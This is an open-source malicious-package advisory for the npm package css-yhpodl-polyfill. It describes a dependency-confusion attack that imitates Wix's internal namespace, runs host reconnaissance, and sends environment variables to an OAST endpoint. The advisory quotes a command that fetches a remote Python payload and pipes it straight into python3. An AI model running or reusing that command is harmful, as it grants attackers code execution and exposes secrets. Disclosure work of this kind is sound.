{"id":"MAL-2026-17578","summary":"Malicious code in css-yhpodl-polyfill (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5936fc65b4eba7b461c0eef7b66dfeecdc2da412f54fd667873e3e6950b0a857)\ncss-yhpodl-polyfill ships thunderboltRegistry.js which, as an IIFE executed on require, runs shell reconnaissance (`id`, `whoami`, `env`, `ifconfig`/`ip addr`, hostname) via child_process.execSync and sends the collected host identity and full environment variables via GET to the hardcoded Burp Collaborator OAST endpoint https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/. The same file executes `curl -L https://appsecc.com/py | python3`, piping an attacker-controlled remote Python payload into python3 for arbitrary code execution on the installer host. The package name and exported identifiers (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix's internal thunderbolt namespace, and registry-manifest.min.json references parastorage.com (Wix CDN) — the shape of a targeted dependency-confusion attack against the Wix engineering build pipeline. Installing or requiring this package exfiltrates environment secrets and grants remote code execution to the attacker.\n","modified":"2026-10-05T16:31:36.957538427Z","published":"2026-10-05T16:14:05Z","database_specific":{"malicious-packages-origins":[{"versions":["1.0.0"],"id":"IN-MAL-2026-021075","import_time":"2026-10-05T16:22:56.749263298Z","modified_time":"2026-10-05T16:14:05Z","sha256":"5936fc65b4eba7b461c0eef7b66dfeecdc2da412f54fd667873e3e6950b0a857","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/css-yhpodl-polyfill/v/1.0.0"}],"affected":[{"package":{"name":"css-yhpodl-polyfill","ecosystem":"npm","purl":"pkg:npm/css-yhpodl-polyfill"},"versions":["1.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/css-yhpodl-polyfill/MAL-2026-17578.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"thunderboltRegistry.js","sha256":"098fac4f87d662808d1fcb744c79416ac42dd1ae997a1f96a998f2f3b46ce699","tlsh":"e07131b5b99df02166c33438db7f5049b4bb86672c6caee0740899b01f7585c01ba6f4"}],"package_integrity":[{"filename":"css-yhpodl-polyfill-1.0.0.tgz","hashes":{"sha512_sri":"sha512-oswywbFoijkgGvyOFTgnks8QB92LFOk+2erb5YFiB0mPjrB8hxhT9fQOTsZvQYxjUjBmfRlNAe3+loIbsXqPRA==","sha1":"debbd9cf7fd89ebc1b3427cbf2fc359987d4894d"}}]}}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}